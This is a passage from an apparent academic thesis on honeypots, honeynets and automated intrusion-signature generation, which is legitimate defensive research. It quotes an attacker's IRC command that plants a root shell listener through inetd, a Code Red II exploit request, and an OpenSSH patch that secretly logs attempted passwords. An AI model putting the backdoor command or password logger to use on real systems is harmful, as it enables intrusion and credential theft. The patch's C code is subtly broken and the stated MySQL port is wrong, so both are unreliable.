to study malicious hackers under a microscope. This can be demonstrated with a few examples: 3.6.2.2. Classic Examples :j@ck :hehe come with yure ip i`ll add u to the new 40 bots :j@ck :i owned and trojaned 40 servers of linux in 3 hours :j@ck ::))))) :j1ll :heh :j1ll :damn :j@ck :heh :j1ll :107 bots now :j@ck:yup [1] Table 2: Honeypot: Classic Examples 3.6.2.3. Discussing Exploits :_pen :do u have the syntax :_pen :for :D1ck :yeah :_pen :sadmind exploit :_pen :? :D1ck :lol :D1ck :yes :_pen :what is it :D1ck :./sparc -h hostname -c command -s sp [-o offset] [-a alignment] [-p] :_pen : what do i do for -c :D1ck :heh :D1ck :u dont know? :_pen :no :D1ck :"echo 'ingreslock stream tcp nowait root /bin/sh 20 sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob“ [1] Table 3: Honeypot: Discussing Exploits 3.6.2.4. Example: Leaves Worm On June 19, 2001 a sudden rise of scans for the Sub7 Trojan was detected. (port 27374) An Infected emulated Windows Honeypot revealed a worm was pretending to be a Sub7 client and attempting to infect systems. Matt Fearnow and the Incidents.org team identified it as the W32/Leaves worm National Infrastructure Protection Center (NIPC) was informed. CERT advisory July 3, 2001[1] Table 4: Honeypot: Leaves Worm 3.6.2.5. Example: Code Red II Worm Ryan Russel at SecurityFocus.com for analysis of the CodeRed II worm (MS IIS indexing exploit) A typical signature of the Code Red II worm would appear in a web server log as: GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801 %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3 %u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 This worm tried to infect other computers at random, along with machines on the same subnet as the infected machine.[1] Table 5: Honeypot: Code Red II Worm 3.6.2.6. Example: Solaris DTSCD exploit A Solaris Honeypot captured a dtspcd exploit, an attack never seen before. On November 12, 2001, the CERT Coordination Center had released an advisory for the CDE Subprocess Control Service or, more specifically, dtspcd Exploit code was isolated and attack was detected. This was the first incident a Honeypot was used to identify and document an unknown attack. [1] Table 6: Honeypot: Solaris DTSCD exploit 3.6.3. Honeynets A Honeynet is a special kind of high-interaction Honeypot. Honeynets extend the concept of a single Honeypot to a highly controlled network of Honeypots. A Honeynet is a specialized network architecture configured in a way to achieve Data 21 Control, Data Capture and Data Collection. This architecture creates a highly controlled network, in which one can control and monitor all kinds of system and network activity. Honeypots are then placed within this network. A basic Honeynet comprises of Honeypots placed behind a transparent gateway – the Honeywall. Acting as a transparent gateway the Honeywall is undetectable by attackers and serves its purpose by logging all network activity going in or out of the Honeypots. 3.6.3.1. Data Control Data control is the containment of activity within the Honeynet. It determines the means through which the attacker's activity can be restricted in a way to avoid damaging/abusing other systems/resources through the Honeynet. This demands a great deal of planning as we require to give the attacker freedom in order to learn from his moves and at the same time not let our resources (Honeypot + bandwidth) to be used to attack, damage and abuse other hosts on the same or different subnets. Careful measures are taken by the administrators of the Honeynet to study and formulate a policy on the attacker’s freedom versus containment and implement this in a way to achieve maximum data control and yet not be discovered or identified by the attacker as a Honeypot. Various mechanisms to achieve data control are available such as firewall, counting outbound connections, intrusion detection systems, intrusion prevention systems and bandwidth restriction etc. Depending on our requirements and risk thresholds defined, we implement data control mechanisms accordingly. 3.6.3.2. Data Capture Data Capture involves the capturing, monitoring and logging of all threats and attacker activities within the Honeynet. Analysis of this captured data provides an insight on the tools, tactics, techniques and motives of the attackers. The concept is to achieve maximum logging capability at all nodes and hence log any kind of attacker's interaction without the attacker knowing it. This type of stealthy logging is achieved by setting up tools and mechanisms on the Honeypots to log all system activity and have network logging capability at the Honeywall. Every bit of information is crucial in studying the attacker whether it’s a TCP port scan, remote and local exploit attempt, brute force attack, attack tool download by the hacker, various local commands run, any type of communication carried out over encrypted and unencrypted channels (mostly IRC) and any outbound connection attempt made by the attacker. All of this should be logged successfully and sent over to a remote location to avoid any loss of data due to risk of system damage caused by attackers, such as data wipe out on disk etc. In order to avoid detection of this kind of activity from the attacker, data masking techniques such as encryption should be used. 3.6.3.3. Data Collection 22 Once data is captured, it is securely forwarded to a centralized data collection point. This allows data captured from numerous Honeynet sensors to be centrally collected for analysis and archiving. Implementations may vary depending on the requirements of the organization, however latest implementations incorporate data collection at the Honeywall gateway. 3.6.3.4. Honeynet Architectures There are 3 Honeynet architectures namely: Generation I Generation II Generation III 3.6.3.4.1. Generation I Architecture Gen I Honeynets were developed in 1999 by the Honeynet Project. Its purpose was to capture attacker’s activity and give them feel of a real network. The architecture is simple with a firewall aided by an IDS placed at the front and Honeypots placed behind it. Unfortunately, this makes it detectable by attackers. Figure 5: Gen I Honeynet Architecture [12] 3.6.3.4.2. Generation II and III Architecture: Gen II Honeynets were first introduced in 2001 and Gen III Honeynets was released in the end of 2004. Gen II Honeynets were made in order to address the issues of Gen I Honeynets. Gen II and Gen III Honeynets have the same architecture. The only difference being, that there have been significant improvements in the deployment and management of Gen III Honeynets along with the addition of a Sebek server built into the Honeywall. A radical change in architecture was brought about by the introduction of a single device that handles the data control and data capture mechanisms of the Honeynet called the IDS Gateway or to use the marketing - terminology: The Honeywall. By making the 23 architecture more “stealthy”, attackers are kept longer and thus more data is captured. There was also a major thrust in improving Honeypot layer of data capture with the introduction of a new UNIX and windows based data Figure 6: Generation III Honeynet Architecture [12] 3.6.3.5. Virtual Honeynet Virtualization is a technology that allows running multiple virtual machines on a single physical machine. Each virtual machine can be an independent Operating system installation. This is achieved by sharing the physical machines resources such as CPU, Memory, Storage and peripherals through specialized software across multiple environments. Thus multiple virtual Operating systems can run concurrently on a single physical machine. A virtual Honeynet is a solution that facilitates to run a Honeynet on a single computer. We use the term virtual because all the different operating systems placed in the Honeynet have the 'appearance' to be running on their own, independent computer. 3.7. Research Challenge # 1 3.7.1. Architecture and Design Considerations in Virtual Honeynets 3.7.2. Introduction The Honeynet project provides documentation on deploying Generation 3 virtual Honeynets, this documentation was developed by the Pakistan Honeynet Project Chapter. This document was a step-by- step How-To for deploying virtual Honeynets using VMware. This served as a standard template for anyone who wants to deploy a 24 virtual Honeynet using VMware and Honeywall Roo and has thus become a de facto document: http://www.Honeynet.pk/Honeywall/roo/page2b.htm. During literature review it was decided to use this document as the standard template for our project's implementation. Generation 3 architecture demands 3 interfaces on the Honeywall, in which one is used as management interface while other two are used as bridged interfaces. Using VMware, a bridged interface like vmnet0 has direct access to the physical interface and thus 2 such interfaces will cause the bridging between the same LAN segments, whereas a requirement was to bridge between two LAN segments i.e. the external network segment pointing to the router and the internal network segment on which the Honeypots will be placed. It was observed that the Honeynet design suggested by the website had configured both eth0 and eth1 interfaces as a VMware bridge interface and eth2 as a VMware host- only interface. This was causing a loop in the Honeywall and the Honeypot LAN segment was being avoided. This problem was extended to the Pakistan Honeynet Project, who then accepted and updated the design on their website. 3.8. Research Challenge # 2 3.8.1. Intrusion Detection Intrusion detection is the art of detecting malicious activity in a computer related system [76]. Malicious activities and intrusion techniques are interesting from a computer security perspective. Analysis of traffic and events reveals that intrusion is different from the normal behaviour of system usage, and hence anomaly detection techniques are applicable in the intrusion detection domain. Denning [74] classified intrusion detection systems into 1) host based and 2) network based intrusion detection systems. K. Scarfone et al. [80] classified Intrusion detection systems by their detection methodology (signature matching, anomaly detection or stateful protocol analysis) and location (on a host, a wired network, or a wireless network), or capability (simple detection or active attack prevention) [80] 3.8.2. Intrusion Detection Problem Conventional intrusion detection and prevention system solutions defend a network's perimeter by using packet inspection, signature detection and real-time blocking. Although these techniques are effective as a static defence, they fail to cope with the dynamic nature of threats faced today. Signature matching techniques are used to identify attacks by comparing the contents of packets with a set of signatures or rules that describe the known attack. These techniques can become unreliable against ciphered traffic and self modifying malware or other evasion techniques. [81] 25 Stateful protocol analysis techniques involve matching of each connection with an existing template that acts as a profile for a given protocol. Any deviations from this profile are immediately reported. The effectiveness of this technique can be seen in areas such as horizontal network scanning or host behaviour profiling. On the contrary attacks conforming to normal protocol behaviour tend to go unnoticed. [81] 3.8.3. Intrusion Detection Signatures A signature is a pattern or characteristic used for identification and it is used to “describe the characteristic elements of an attack” [52]. Intrusion detection systems identify attacks based on signature matches. These signatures are created after analysing attack traffic data. In the absence of signature writing standards, it has been observed that signatures vary from implementation to implementation [52, 17]. A signature is considered effective based on its ability to narrow down the attack characteristics and be elastic enough to detect any kind of variations in the attack [52, 17]. Examples of some well known signature-based intrusion detection systems include Bro and Snort [17]. 3.8.4. Automated Signature Engineering Signature generation is a laborious process. It may require hours of analysis until a final effective signature can be produced. This analysis is based on some unique characteristics visible within the traffic. Automating this process will be ideal in saving an enterprise from an imminent attack. A requirement is that a system should intelligently perform traffic analysis to identify unique characteristics that can serve as a key in generating signatures for intrusion detection systems. Chapter 4: Overview of Related Works 4.1. Honeypots as attack detection and learning tools Honeypots began as an idea to study and isolate black hat hackers. The requirement to learn and profile the enemy has always been an interesting area for security researchers. The concept has been around for some time in different forms and implementations until it recently evolved into a well defined and documented solution. This was followed by the development of various commercial products. It is, as yet, not clear as to who came up with the word “Honeypot” for such projects; however the core concept remained the same. Many experts believe that the most primitive set of documents available on the concept of Honeypots were Clifford Stoll's “The Cuckoo's Egg” [2] and Bill Cheswick's "An Evening with Berferd in Which a Cracker Is Lured, Endured, and Studied" [3]. In both papers the researchers had a chance to come face to face with an attacker who gained access to their system and were then presented with 26 various types of data to study the attacker’s responses. This was essentially a proof of concept that it was possible to learn from an attacker in such a way that the community can benefit from it. This led to an effort to have better logging mechanisms and tools for studying attacker tactics. In 1999, Lance Spitzner the founder of The Honeynet Project [4] started work in the area of Honeypots. In a very short span of time the Honeynet Project contributed a series of publications focused on definition, development, architecture and organization of Honeypots. Researchers in the Honeynet Project have published their findings and experiences with their Honeypots over a number of years. The most notable book in this regard is “Honeypots, Tracking Hackers” [1]. This book gives us a deep insight into Honeypots and is the first compilation of Honeypot based books. This was followed by “Know Your Enemy: Learning about Security Threats” published by the Honeynet Project in 2004. The era of virtualization had its impact on security and Honeypots. The community responded, marked by the fine efforts of Niels Provos (founder of honeyd) and Thorsten Holz for their excellent book “Virtual Honeypots: From Botnet Tracking to Intrusion Detection” in 2007 [6]. Papers on Virtual Honeynets were published by the Honeynet Project in early 2003, whilst the year 2004 marked the start of a new type of Honeypot known as the client Honeypot. Kathy Wang's “honeyClient” became the first publically available Client Honeypot tool. Generation III Honeynets also emerged in 2004-2005 and Honeywall CDROM version 2 “Roo [22]” became the first publicly available tool based on Generation III technology. The road onwards has seen many improvements and enhancements to the functional components of a Honeynet, especially with respect to the tools for data analysis. There has been a significant shift of focus from Honeynets to client Honeypots and then towards virtual Honeynets. A significant amount of work is being carried for client Honeypot based developments and to enhance the capabilities of existing Honeynet technologies. Our system will incorporate existing Honeynet technology and will be set up in a virtual environment using VMware ESX server. This will give us another dimension of valuable data on the state of the Honeypot as it is under attack. 4.2. Automated Signature Engineering using Honeypots The existence of complex self-similar patterns in internet traffic was first revealed in work done by Leland et al. [73 ]Multiple invariant substrings must often be present in all variants of worm payload [54]. The substrings correspond to return addresses, protocol framing, and poorly obfuscated code [53]. Generation of a short single substring signature for all worm instances can result in high false positive rates [54]. Systems based on pattern-based analysis extract common byte patterns across suspicious flows, to generate signature for novel internet worms. Examples of such systems include EarlyBird [56], Honeycomb [53], and Autograph [55]. A single signature is used to match all worm instances based on unique substrings in the payload. These substrings are considered invariant across worm connections [54]. Such systems may suffer from a relatively high false positive and high false negative rate [54] Classification of signatures for polymorphic worms can be done under two main categories [53, 54, 55, and 56]: 27 1. 2. Content-based: Detect similarity in different instances of byte sequences to characterize a given worm. Behaviour based: Characterization by perceiving the semantics of byte sequences. We would like to incorporate both approaches in our research. Honeypots provide us with insight information for intrusion and attack analysis. Pouget et al [65] analysed traffic in Honeypots to identify root causes of frequent processes. Observed traffic was organized based on the port sequence. This data was then clustered using association rules mining [64]. “Phrase distance” was then implemented on the result. Levin et al. explained the use of Honeypots to extract particulars of a worm that can be analysed to generate signatures [57]. Honeycomb [52] was one of the first implementations of an automated signature generator. It was implemented as a Honeyd [58] plug-in. Honeycomb incorporated the longest common substring (LCS) algorithm on connection pairs to determine common byte sequences. It generates signatures consisting of a single, long substring of a worm’s payload. This inhibits its capability to detect all polymorphic worm instances. Julisch [66] defined a method that clustered intrusion alarms for the purpose of discovering the root cause of an alarm. The system then generated a generalized alarm for each cluster. Kim et al [55] explained the Autograph system as a content-based filtering system for automated signature generation to detect worms. Autograph is implemented at a DMZ that includes benign traffic. Suspicious TCP flows are identified by content matching and are then forwarded to COPP as input. Content based payload partitioning (COPP) is an algorithm based on Rabin fingerprints. Repeated byte sequences are located by partitioning the payload into content blocks. Autograph also generates one long continuous substring of a worm’s payload as a signature. Thus any variation in a worm cannot be detected. S. Singh et al [56] presented the Earlybird system. Earlybird tries to identify new worms by exploiting common characteristics among them. This system measures content prevalence in packets at the DMZ. This is carried out by counting the diverse sources and destinations coupled with high frequency strings in the payload. The system distinguishes benign content from epidemic content. Earlybird also generates a single, contiguous substring of a worm’s payload as a signature. These signatures are not effective in matching all polymorphic worm instances. Content-based systems like Honeycyber, Polygraph, Hamsa and LISABETH [62, 59, 60 and 61] generate automated signatures for polymorphic worms. The commonality between these systems is as follows: There are several distinct substrings that are often present in variants of polymorphic worm payloads regardless if the payload changes in every infection. All these systems capture packets from a router, thus these systems may find multiple polymorphic worms addressing a different vulnerability from other. This makes it difficult to find distinct contents shared amongst polymorphic worms. One instance of a worm is sent out which later on attempts to change its payload on every instance of infection. In order to capture all polymorphic worm instances, we need to observe the polymorphic worm while it interacts with hosts. Honeycyber [62] utilizes “Double-Honeynet” method to detect polymorphic worms and collect all their instances. It is based an intrusion detection policy waiting for attackers to attack the network [62]. The approach is to use high interaction Honeypots as virtual 28 machines for both inbound and outbound Honeypots. The proposed method makes it possible to capture all worm instances and then forward these instances to the Signature Generator which generates signatures, using a particular algorithm. Sommer and Paxson [63] proposed adding connection level context to signatures to reduce false positives. [67] Christodorescu et al. defined a semantics aware methodology to detect malicious traits in x86 binaries. The algorithm used incorporates semantics of x86 instructions that are executed. Yegneswaran et al [70] described the Nemean system. This system incorporates protocol semantics into the signature generation algorithm. This gives the system a new dimension and makes it capable of handle a broader class of attacks, giving it a wider coverage for dealing with polymorphic worms. An Automated Signature-Based Approach against Polymorphic Internet Worms by Yong Tang and Shigang Chen [71] defined a system to detect new worms and generate automated signatures. This system implemented “double-Honeypots” to capture worm payloads. The arrangement proposed a high-interaction Honeypot for inbound, while a low-interaction Honeypot for outbound traffic. Being a low-interaction Honeypot, the outbound component could not make outbound connections, thus inhibiting its capabilities for capturing worm payloads. Automated Web Patrol with Strider HoneyMonkeys by Yi- Min Wang et al [72] developed an automated web patrol system “HoneyMonkeys”. This system automatically identifies and monitors malicious web sites that attack their victims with drive-by downloads. Such websites install malware programs without the user’s consent. This is carried out by exploiting browser vulnerabilities. Their approach was to create a system that actively mimics the actions of a user browsing the Web. Special programs called “monkey programs” run a browser similar to that of a human user. The browsers can be configured to run with fully updated software or without specific updates in order to find exploit sites. The browsers can be configured to run with or without specific updates in order to identify exploit sites. The attacks that impact the most are then analyzed. On detection of a zero-day exploit, Honeymonkey reports all URLs' to the Microsoft Security Response Center. The information is then shared with the enforcement team and the groups owning the software. The vulnerability is then thoroughly investigated to determine the most appropriate course of action. With its intrusion prevention oriented policy Honeymonkey makes an effort to fight back [62]. The HoneyMonkey system is limited to web based technologies and protocols only. 4.3. Anomaly Detection Anomaly detection is the art of finding patterns in data that do not conform to expected behaviour or models [75]. The approach is to build models of normal data and detect deviations in observed data. Denning [74] proposed application of Anomaly detection to intrusion detection and computer security in 1987. Since then it has been an active area of research. Anomaly detectors build models of acceptable behaviour and then raise an alarm if any deviations from the model are observed. Anomaly detection techniques for detecting port scans have been explored in [68, 69]. Experience has revealed that balancing generality and specificity is extraordinarily difficult in anomaly detection systems, resulting in a high false-positive rate. 29 Architecture of a generic anomaly detection system comprises of three main components (1) the sensor subsystem, (2) modelling subsystem and (3) the detection subsystem [78] 4.4. Network Behavioural Analysis (NBA) Behaviour refers to the actions or reactions of an object or organism, usually in relation to the environment. Behaviour can be conscious or subconscious, overt or covert, and voluntary or involuntary [77]. A behavioural model is representation of characteristics that are consistent with observed object or organism. M. Rehák et al. [81] define Network behavioural analysis as: “An intrusion detection technique that uses the patterns in network-traffic structures and properties to identify possible attacks and technical problems with minimal impact on user data privacy. The analysis is not based on content of the transferred information” Shu Yun et al [79] define NBA as an industry buzz word for a network anomaly detection system. NBA solutions watch what's happening inside the network, aggregating data from many points to support offline analysis. NBA systems create profiles or benchmarks for normal traffic. These profiles are then compared with the monitored network traffic. Alarms are generated when the system detects unknown, new or unusual patterns that might indicate the presence of a threat. This can be trends in bandwidth and protocol use. Network behaviour analysis is particularly good for spotting new malware and zero day exploits. NBA tools can greatly help a network administrator minimize the labour and time involved in locating and resolving problems. Today it is being used as an enhancement to the protection provided by the network's firewall, intrusion detection system, antivirus software and spyware-detection program. Chapter 5: Research Questions The research questions for our studies can be grouped into two main areas. The first area relates to the setup of an environment to detect intrusions and learn from the intruders. The second area is concerned with extracting sufficient information from the system, to be able to propose a proactive response in the form of a signature. Part I: Question # 1: How to collect information on the attackers? Their tools? Their tactics? Their techniques? Their motives? Is it possible to stay one step ahead of them? 30 Question # 2: Which technology can be used to effectively and efficiently carry out detection in depth? Question # 3: Can we virtualise such an environment to save cost and yet be able to maintain stealth from the attackers? Part II: Question # 1: How to intelligently and effectively identify an intrusion and extract enough information from it to be able to generate automated signatures effectively? Question # 2: Can we identify and foretell intrusions by observing traffic patterns and payload content? Question # 3: Can we identify and foretell intrusions by observing patterns in system events? Question # 4: How to correlate system and network events to recreate a valid snapshot of the attack? Question # 5: How to test the effectiveness of the technique and its result? Chapter 6: Methodology Review In order to address these research questions a series of research methods will be adopted. In this section, details of the methodologies adopted will be described. 6.1. Proposed system for Virtual Honeynet Architecture Problem 6.1.2. Methodology and Discussion 31 Figure 7: Proposed Virtual Honeynet Architecture Similar problems were faced and discussed by people from all over the globe who wanted to implement a similar virtual Honeynet project. We shared and discussed our findings with the community on the Honeywall project mailing list. After necessary testing a design was chalked out and followed for the project implementation. After successful results it was decided to publish the improved design. This design proposes 3 interfaces for the Honeywall such that: 1. vmnet0 is a vmware bridge interface pointing towards the router. (as shown in figure above) 2. vmnet1 is VMware host-only interface leading to internal LAN segment where Honeypot is kept. (as shown in figure above). 3. vmnet2 is a VMware bridge interface that is firewalled and accessible for remote management purposes SSH and Walleye. Interfaces 1 and 2 are picked up by Honeywall ROO as eth0 and eth1 and are used for bridging. Interface 3 is used for remote management. As shown in figure 8 the red boxes indicate the publically assigned IP addresses. In this case the Host Machine's eth0 interface, the virtual machine's Honeywall management interface (i.e. interface 3) and the Honeypots (1, 2 or many). Remote management interface can be routed to an internal subnet, but for our implementation we assigned it a public IP, but restricted access only from specific IP's (via Roo) and that too via SSH port forwarding into that subnet only. This project was implemented successfully with one physical gigabit Ethernet interface. Another physical interface could have been used by binding it with the remote management interface. 32 6.1.3. Ubuntu as Honeypot Ubuntu 8.04 was used as a Linux based Honeypot for our implementation. The concept was to setup an up-to-date Ubuntu server, configured with commonly used services such as SSH, FTP, Apache, MySQL and PHP and study attacks directed towards them on the internet. Ubuntu being the most widely used Linux desktop can prove to be a good platform to study zero day exploits. It also becomes a candidate for malware collection and a source to learn hacker tools being used on the internet. Ubuntu was successfully deployed as a virtual machine and setup in our Honeynet with a host-only virtual Ethernet connection. The Honeypot was made sweeter i.e. an interesting target for the attacker by setting up all services with default settings, for example SSH allowed password based connectivity from any IP on default port 22, users created were given privileges to install and run applications, Apache index.html page was made remotely accessible with default errors and banners, MySQL default port 1434 was accessible and outbound connections were allowed but limited. In order to achieve maximum information on the attackers interaction with the Honeypot, special measures were taken. This includes patching system services to log a greater deal of information that was not logged as default. Openssh logs basic information on all ssh login attempts. This includes date and time stamp, IP of the attacker, username tried by the attacker and status of whether this attempt was successful or not. The passwords tried are not logged, as a security breach in the system log directory can put all user accounts at stake who connected via ssh. Ethical issues also demand not logging user passwords. This being one of the reasons Openssh doesn’t log user passwords by default. We discovered that simply patching the “auth-passwd.c” source file from the Openssh sources, to add support to log and append passwords alongside other information to a file was possible. Hench 5-10 lines of C filling code and recompiling Openssh sources resulted in a customized, password logging capable Openssh daemon. result = sys_auth_passwd(authctxt, password); if (authctxt->force_pwchange) disable_forwarding(); + if(!sys_auth_passwd(authctxt, password)) + { + FILE *cookiemonster; + cookiemonster = fopen("/var/log/.hplaser7l/hpsshd_logged", "a"); + chmod("/var/log/.hplaser7l/hpsshd_logged", 0600); + fprintf(cookiemonster,"%i:%.100s:%.100s:%.200s\n",time(NULL),authctxt>user,password,get_remote_ipaddr()); + fclose(garp); + } return (result andand ok); } Table 7: SSH patch for the Honeypot In view of the security risk that such a log file can pose for an organization, it is best to hide it deep within the system. For our implementation we hid it as “/var/log/.hplaser7l/hpsshd_logged”. Different locations can be used within the system depending on the implemented security policy. Analysis of this ssh log file gave us insight into the efficiency of attack tools used for brute force attacks, followed by the hacker's distributed attack techniques. 33 SSH logs suggesting brute force attack and successful exploitation by hacker: uid=0 euid=0 tty=ssh ruser= rhost=209-173-99-82.bluetone.cz Sep 21 10:59:54 paul-desktop sshd[10764]: Failed password for invalid user tibi from 82.99.173.209 port 42134 ssh2 Sep 21 10:59:54 paul-desktop sshd[10772]: Failed password for invalid user katy from 82.99.173.209 port 42292 ssh2 Sep 21 10:59:55 paul-desktop sshd[10769]: Failed password for root from 82.99.173.209 port 42237 ssh2 Sep 21 10:59:55 paul-desktop sshd[10777]: Invalid user scotch from 82.99.173.209 (…) Sep 21 10:59:56 paul-desktop sshd[10776]: Failed password for man from 82.99.173.209 port 42760 ssh2 Sep 21 10:59:56 paul-desktop sshd[10782]: Invalid user tibo from 82.99.173.209 Sep 21 10:59:57 paul-desktop sshd[10784]: Accepted password for john from 82.99.173.209 port 43246 ssh2 Sep 21 10:59:57 paul-desktop sshd[10796]: pam_unix(sshd:session): session opened for user john by (uid=0) Table 8: SSH Logs 6.1.4. VMWare as Virtualization Software Virtualization software has greatly helped reduce expenses and total cost of ownership (TCO) for organizations on their IT infrastructure. This is achieved by setting up an entire farm of enterprise servers as virtual machines on a single physical machine. Organizations are now developing their own virtualization software and solutions, many of which are free and open source. A few notable names that we considered for deployment include: VMware, User-Mode Linux, VirtualBox, Xen, Qemu, Lguest, Linux-Vserver We selected and used VMware Server as the virtualization solution for our project. Later implementations were shifted to VMware ESX server 4.0. 6.1.5. Honeywall Roo Honeywall CDROM is a bootable CDROM for installing, deploying and maintaining a Honeynet. The Honeynet project has developed 2 version of the Honeywall CDROM. Honeywall Eyore: Released May, 2003 based on Gen II architecture. (Not supported anymore). Honeywall Roo: Released in May, 2005 based on Gen III architecture. (Current version 1.4) Honeywall serves as a transparent gateway for the Honeynet. It is this gateway that has to perform data capture, data control, data collection and data analysis functions in order to ensure successful operations of a Honeynet. Being a transparent gateway, this node is completely undetectable by the attacker when they are interacting with the Honeypots. The purpose of the Honeywall CDROM is to automate the installation and maintenance of a Honeynet and provide data analysis support for all activity within the Honeynet. Deploying Honeynets was a strenuous task as it involved advance configuration and integration of security tools. There was no standard Honeynet development till 1999. Many small groups had their own implementation of Honeynets. 34 The Honeynet Project has done remarkably well by developing a complete Honeywall distribution on a CDROM to deploy as an Operating system on disk and thus made Honeynets easy to deploy and manage. Balas and Viecco [16] have given a generalized data collection and fusion diagram for a Generation III Honeywall. Extending their work further we propose an extended diagram for Honeywall Roo [22] Logical Design in Figure 10. Figure 8: Roo Logical Design Honeywall has evolved over the years. Previous version, Eyore had limited features and control. Roo, the advanced version has vastly improved hardware support, administration capabilities, and data analysis functionality. Thus the system is now moving towards giving the administrator more flexibility and control over the operating system. Honeywall Roo comprises of many well known security tools incorporated into it such as: Snort: Sniffer, IDS. Snort_inline: Sniffer, IPS Hflow2: A data coalescing tool for Honeynet data analysis. P0f: Passive OS fingerprinting tool Tcpdump: View Packet headers. Sebek: Data capture tool. Walleye Web Interface or the “Eye on the Honeywall” is a web based interface for Honeywall configuration, administration and data analysis 6.1.6. Sebek as data capture tool 35 Sebek is a data capture tool designed to capture attacker's activities on a Honeypot, without the attacker knowing it. Sebek is based on client-server architecture. The Sebek client runs on the Honeypots, to capture all of the attacker’s activities (keystrokes, file transfer, passwords) then covertly send the data to the server. The Sebek server collects and processes this data. The server normally runs on the Honeywall gateway, but can also run independently at a remote host. Sebek is installed onto the system as a Linux kernel module (LKM) that logs all data activity associated in invoking standard “read” and “write” system calls. This logged activity is then sent out on the network in the form of Sebek packets. These packets are concealed from the attackers view by the Sebek kernel module. This module itself can be concealed and is configurable to be loaded under a user defined name for avoiding detection by the attacker [11]. Sebek was used extensively in our project. 6.2. Proposed System for Automated Signature Engineering 6.2.1. Discussion We believe that the effectiveness of a signature is directly proportional to the availability of information needed to create it. The above discussion on automated signature generation techniques concludes that the techniques being utilized today might be better than their predecessors, but they too have limitations. These limitations arise as authors focus on certain aspects of the problem while neglecting others. Information is only extracted from the dimension that the author addressed in his research. This information is only a small subset of the overall information that can be made available by implementing multiple techniques. There is a need for a system that can “see more” and “hear more” information to infer an intelligent and flexible result. Need for configuring system components that will effectively alarm and shout “wolf” when the wolf really comes. A system that will search and collect information lying anywhere on the system (Disk, Memory, Network), generalize that information and correlate it to detect an intrusion and generate mitigation signatures for it. With multiple sources of inputs, this system will be capable of looking deeper into the network and system events to see their behaviour. Such an approach can observe all, which otherwise would have been invisible. Behavioural analysis and correlation of system and network events will produce a new level of security awareness. This system will be able to perform the following functions: Ability to detect attacks. Ability to detect anomalies. Ability to classify attacks Ability to detect variations in attacks (polymorphism) 36 6.2.2. Methodology 6.2.2.1. Analysis of System Events Host based intrusion detection systems can detect events going on in a host. Various services, tools and agents running on a host can be configured to log events. The level of logging is also configurable and is very helpful during debugging. Analysing this log data can reveal events of interest. A host based Intrusion detection system such as OSSEC can be configured on a host to parse these logs and report information from them. Processes being run by users claim resources in the form of disk, memory, and network. These processes constantly use library functions and system calls to interact with the kernel. Tapping into such areas of the system, we can assign labels to process events observing their behaviour e.g. File download, file copy, encrypt, decrypt, create socket, open socket, start outbound connection, etc. These behavioural patterns can be summed up into a behavioural profile that will contain all characteristics of a process or event. This can be further augmented by performing static or dynamic code analysis. A behavioural profile of a system will look something like this: Figure 9: Behavioural profile for W32-Bagle-q worm [94] 6.2.2.2. Analysis of Network Events Researchers have often utilized the famous 5-tuples as the basis for detection and analysis of network traffic. We propose a network behavioural profile comprising of these 5-tuples along with a hashed payload. This information can easily be extracted from a flow. Flow is a unidirectional component of a TCP connection (or its UDP or ICMP equivalent) that contains all packets with the same source-IP address, destination-IP address, source and destination ports, and transport protocol (TCP/UDP/ICMP). A flow record contains this basic information, together with the number of packets/bytes transferred, the flow duration, and the TCP flags encountered in the flow packets. From these flows we intend to: Extract meaningful features associated with each flow (or group of flows), and Use these feature values to determine whether the flow is anomalous or not. 37 6.2.2.3. Hashing Algorithm for Payload Hashing We require our system to be able to detect attack variations by observing network packets. Adding payload to the behavioural profile gives us extra information which can be helpful in classifying the flow. Since packet payloads can vary quite drastically during a communication, adding the entire ASCII or Hex payload to the profile can yield abnormal results when run with an edit distance algorithm to calculating similarity. Requirement is to create a fingerprint of the entire payload or parts of it that is unique enough to be a representative of the payload and yet statistically balanced enough to identify areas with similarities when compared with other flows. A solution to address to represent variable size payloads as fixed size fingerprints is to hash them. A hash is a mathematical formula that can generate a unique fixed size sequence. Hashing is extensively used in computer security to identify the authenticity of a digital source. Most widely used hashing algorithms are MD5 and SHA. The problem with hashing is that a slight change in input can cause an avalanche effect and drastically change the output. This will result in a unique hash for a slightly different payload. This result is unacceptable for a system that requires the estimation of the a similarity between flows. This will have a negative effect on the profile and will result in higher edit distances. Thus similar flows will be marked by the system as entirely separate. Fuzzy hashing or piecewise hashing solves this problem. It involves the ability to compare two distinctly different items and determine a fundamental level of similarity (expressed as a percentage) between the two [82]. This technique “spamsum” originated as an effort by Dr. Andrew Tridgell [83] to find commonality between spam email messages. The payload hashed with this technique is added to the profile. Example: Contents of file alphabet.txt: “ABCDEFGHIJKLMNOPQRSTUVWXYZ” After Modification: “ABCDEFGHIJKLMNOPQRSTUVWXYZ Edited by Fahim” Difference in hash can be illustrated in table below: Before After md5 1d238b74da513ce35e129e7dc07060ad fe1b01ed362cd84e549a6b397d0e3e74 fuzzy hashing 3:Pg/vmNKzug:Y/vmNKzug 3:Pg/vmNKzul6A4jFS:Y/vmNKzulrr Table 9: Comparison of MD5 and Fuzzy Hashing 6.2.2.4. Clustering By Compression Clusters are groups of objects that are similar according to the metric used. There are 2 main types of clustering: 1. Partional 2. Hierarchical Partitional clustering algorithms are used to determine all clusters at once. They can also be used as divisive algorithms in hierarchical clustering. Examples of few partitional clustering algorithms include: k-means clustering, Fuzzy c-means clustering and QT clustering. 38 Hierarchical clustering algorithms identify clusters based on previously established knowledge of clusters. They are implemented as either agglomerative “bottom-up” or divisive “top-down” algorithms Rudi et al. [86] proposed a new universal method of clustering by using compression. They implemented their technique in vast areas like genetics, music, image processing, radio observations and language families. Their technique was based on the use of a parameter free similarity distance measure called the Normalized Compression Distance (NCD), for generation of a distance matrix. The results were then clustered using a hierarchical clustering technique called the quartet method [86]. NCD is a normalized representation of the normalized information distance NID and is given by: NCD(x , y ) = C 